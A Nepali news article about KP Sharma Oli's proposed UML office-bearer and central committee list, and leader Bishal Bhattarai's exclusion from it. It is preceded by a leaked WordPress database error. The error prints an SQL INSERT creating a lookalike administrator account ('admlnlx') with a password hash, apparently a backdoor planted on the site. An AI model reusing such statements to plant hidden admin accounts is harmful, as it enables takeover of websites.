WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu70i9mjNxaU1MYFV8a6LvTxRikZSl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 22:59:35', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नेकपा एमाले अध्यक्ष केपी शर्मा ओलीका लागि खोटाङका नेता विशाल भट्टराई मरिमेट्ने नेता हुन् ।
एमालेको दशौं महाधिवेशनमा पनि ओलीलाई सर्वसम्मत अध्यक्ष बनाउन उनले लबिङ गरिरहेका थिए ।ओलीले भने प्रतिनिधिसभामा एमाले प्रमुख सचेतक र एमालेको अबको नेतृत्वका लागि सर्वसम्मत नाम पेश गर्ने अधिकार पाएका नेता ओलीले भट्टराईलाई वास्तै गरेनन् ।
ओलीले आइतबार मध्यराति बन्दसत्र हलमा ३०१ जना केन्द्रीय सदस्यको नाम प्रस्ताव गरेका थिए । तर, त्यसमा भट्टराईको नाम परेन । न त उनी पदाधिकारीमै परे । ओलीले आफूलाई केन्द्रीय सदस्यमा समेत नराखेपछि भट्टराईले अपमान महसुस गरेका छन् । ओलीले उनलाई प्रदेश अध्यक्षको आश्वासन दिएको स्रोतले जनाएको छ ।
ओलीले प्रस्ताव गरेका पदाधिकारीहरु
अध्यक्ष केपी शर्मा ओली
वरिष्ठ उपाध्यक्ष ईश्वर पोखरेल
उपाध्यक्षहरु युवराज ज्ञवाली, अष्टलक्ष्मी शाक्य, सुरेन्द्र पाण्डे, रामबहादुर थापा, सुवासचन्द्र नेम्वाङ, विष्णु पौडेल
महासचिव शंकर पोखरेल
उपमहासचिव प्रदीप ज्ञवाली, पृथ्वीसुब्बा गुरूङ, विष्णु रिमाल
सचिवहरु योगेश भट्टराई, गोकर्ण विष्ट, टोपबहादुर रायमाझी, रघुवीर महासेठ, छविलाल विश्वकर्मा, लेखराज भट्ट, पद्मा अर्याल ।